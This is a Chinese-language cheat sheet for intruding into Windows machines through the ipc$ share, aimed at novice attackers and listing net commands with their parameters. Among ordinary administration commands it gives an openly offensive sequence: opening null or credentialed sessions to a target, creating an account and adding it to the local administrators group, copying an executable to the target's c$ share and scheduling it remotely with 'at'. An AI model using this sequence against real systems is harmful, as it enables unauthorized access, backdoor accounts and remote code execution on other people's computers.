利用ipc$入侵的相關命令:
我們在入侵的時候難免遇到忘記命令的時候,現在將我所知道的一些命令總結出來提供給各位。通過這些命令可以解決很大一部分新手的問題。
00:net use
作用:連接計算機或斷開計算機與共享資源的連接,或顯示計算機的連接信息。
命令格式:
net use [devicename | *] [\\\\computername\\sharename[\\volume]] [password | *]] [/user:[domainname\\]username] [[/delete] | [/persistent:{yes | no}]]
參數介紹:
(1)鍵入不帶參數的net use列出網絡連接。
(2)devicename指定要連接到的資源名稱或要斷開的設備名稱。
(3)\\\\computername\\sharename服務器及共享資源的名稱。
(4)password訪問共享資源的密碼。
(5)*提示鍵入密碼。
(6)/user指定進行連接的另外一個用戶。
(7)domainname指定另一個域。
(8)username指定登錄的用戶名。
(9)/home將用戶連接到其宿主目錄。
(10)/delete取消指定網絡連接。
(11)/persistent控制永久網絡連接的使用。
01: net use \\\\X.X.X.X\\ipc$ \"\" /user:\"\" 建立空連接
02: net use \\\\X.X.X.X\\ipc$ \"密碼\" /user:\"用戶名\" 建立非空連接
03: net use \\\\X.X.X.X\\ipc$ /del 刪除連接
04: net time \\\\X.X.X.X
作用:使計算機的時鐘與另一臺計算機或域的時間同步。
命令格式:net time [\\\\computername | /domain[:name]] [/set]
參數介紹:
(1)\\\\computername要檢查或同步的服務器名。
(2)/domain[:name]指定要與其時間同步的域。
(3)/set使本計算機時鐘與指定計算機或域的時鐘同步。
05: net view \\\\X.X.X.X
作用:顯示域列表、計算機列表或指定計算機的共享資源列表。
命令格式:net view [\\\\computername | /domain[:domainname]]
參數介紹:
(1)鍵入不帶參數的net view顯示當前域的計算機列表。
(2)\\\\computername 指定要查看其共享資源的計算機。
(3)/domain[:domainname]指定要查看其可用計算機的域。
06: net use X: \\\\X.X.X.X\\Y 將共享名爲Y的共享資源映射爲本地X盤
07: net use X: /del 刪除映射的X盤
08: net share
作用:創建、刪除或顯示共享資源。
命令格式:net share share name=drive:path [/users:number | /unlimited] [/remark:\"text\"]
參數介紹:(1)鍵入不帶參數的net share顯示本地計算機上所有共享資源的信息。 (2)sharename是共享資源的網絡名稱。
(3)drive:path指定共享目錄的絕對路徑。
(4)/users:number設置可同時訪問共享資源的最大用戶數。
(5)/unlimited不限制同時訪問共享資源的用戶數。
(6)/remark:\"text \"添加關於資源的註釋,註釋文字用引號引住。
09: net user
作用:添加或更改用戶帳號或顯示用戶帳號信息。
該命令也可以寫爲 net users
命令格式:net user [username [password | *] [options]] [/domain]
參數介紹:(1)鍵入不帶參數的net user查看計算機上的用戶帳號列表。
(2)username添加、刪除、更改或查看用戶帳號名。
(3)password爲用戶帳號分配或更改密碼。
(4)*提示輸入密碼。
(5)/domain在計算機主域的主域控制器中執行操作。
10: net start 作用:啓動服務,或顯示已啓動服務的列表。
11: net pause 作用:暫停正在運行的服務。
12: net Continue 作用:重新激活掛起的服務。
13: net stop
作用:停止 Windows NT 網絡服務。
命令格式:net stop service
參數介紹:
(1)alerter(警報)
(2)client service for netware(Netware 客戶端服務)
(3)clipbook server(剪貼簿服務器)
(4)computer browser(計算機瀏覽器)
(5)directory replicator(目錄複製器)
(6)ftp publishing service (ftp )(ftp 發行服務)
(7)lpdsvc
(8)net logon(網絡登錄)
(9)network dde(網絡 dde)
(10)network dde dsdm(網絡 dde dsdm)
(11)network monitor agent(網絡監控代理)
(12)nt lm security support provider(NT LM 安全性支持提供)
(13)ole(對象鏈接與嵌入)
(14)remote access connection manager(遠程訪問連接管理器)
(15)remote access isnsap service(遠程訪問 isnsap 服務)
(16)remote access server(遠程訪問服務器)
(17)remote procedure call (rpc) locator(遠程過程調用定位器)
(18)remote procedure call (rpc) service(遠程過程調用服務)
(19)schedule(調度)
(20)server(服務器)
(21)simple tcp/ip services(簡單 TCP/IP 服務)
(22)snmp
(23)spooler(後臺打印程序)
(24)tcp/ip netbios helper(TCP/IP NETBIOS 輔助工具)
(25)ups
(26)workstation(工作站)
(27)messenger(信使)
(28)dhcp client
(29)eventlog
14:net Statistics
作用:顯示本地工作站或服務器服務的統計記錄。
命令格式:net statistics [workstation | server]
參數介紹:(1)鍵入不帶參數的net statistics列出其統計信息可用的運行服務。
(2)workstation顯示本地工作站服務的統計信息。
(3)server顯示本地服務器服務的統計信息。
例:net statistics server | more顯示服務器服務的統計信息。
15:net Session ( 等同於net sessions 或net sess)
作用:列出或斷開本地計算機和與之連接的客戶端的會話.
命令格式:net session [\\\\computername] [/delete]
參數介紹:(1)鍵入不帶參數的net session顯示所有與本地計算機的會話的信息。
(2)\\\\computername標識要列出或斷開會話的計算機。
舉例說明: net session \\\\cnse8要顯示計算機名爲cnse8的客戶端會話信息列表。
15: net user 帳號名 密碼 /add 添加帳號和密碼
16: net user 帳號名 /active:yes 激活帳號
17: net localgroup administrators 帳號名 /add 將該帳號加入本地admin組
18: Net Send
作用:向網絡的其他用戶、計算機或通信名發送消息。
命令格式:net send {name | * | /domain[:name] | /users} message
參數介紹:(1)name要接收發送消息的用戶名、計算機名或通信名。
(2)*將消息發送到組中所有名稱。
(3)/domain[:name]將消息發送到計算機域中的所有名稱。
(4)/users將消息發送到與服務器連接的所有用戶。
(5)message作爲消息發送的文本。
例:(1)net send /users Welcome to cnse8.com 向所有的連接本機的用戶顯示 \"Welcome to cnse8.com\"
19:net Config
作用:顯示當前運行的可配置服務,或顯示並更改某項服務的設置。
命令格式:net config [service [options]]
參數介紹:
(1)鍵入不帶參數的net config顯示可配置服務的列表。
(2)service通過net config命令進行配置的服務(server或workstation)。
(3)options服務的特定選項。
20:net Accounts
作用:更新用戶帳號數據庫、更改密碼及所有帳號的登錄要求。
命令格式:net accounts [/forcelogoff:{minutes | no}] [/minpwlen:length] [/maxpwage:{days | unlimited}] [/minpwage:days] [/uniquepw:number] [/domain]
參數介紹:
(1)鍵入不帶參數的net accounts顯示當前密碼設置、登錄時限及域信息。
(2)/forcelogoff:{minutes | no}設置當用戶帳號或有效登錄時間過期時。
(3)/minpwlen:length設置用戶帳號密碼的最少字符數。
(4)/maxpwage:{days | unlimited}設置用戶帳號密碼有效的最大天數。
(5)/minpwage:days設置用戶必須保持原密碼的最小天數。
(6)/uniquepw:number要求用戶更改密碼時,必須在經過number次後才能重複使用與 之相同的密碼。
(7)/domain在當前域的主域控制器上執行該操作。
(8)/sync當用於主域控制器時,該命令使域中所有備份域控制器同步。
舉例說明:net accounts /minpwlen:7將用戶帳號密碼的最少字符數設置爲7。
21:copy 路徑 \\ 文件名 \\IP\\共享目錄名
例:copy c:\\cnse8.exe \\\\X.X.X.X\\c$ 將c盤下的cnse8.exe文件複製到對方得的c 盤內。
copy \\\\X.X.X.X\\c$\\cnse8.exe c:\\ 將遠程機器上的文件cnse8.exe複製到自己
機器上。
22:at \\\\IP 時間 程序名 遠程添加某個計劃.
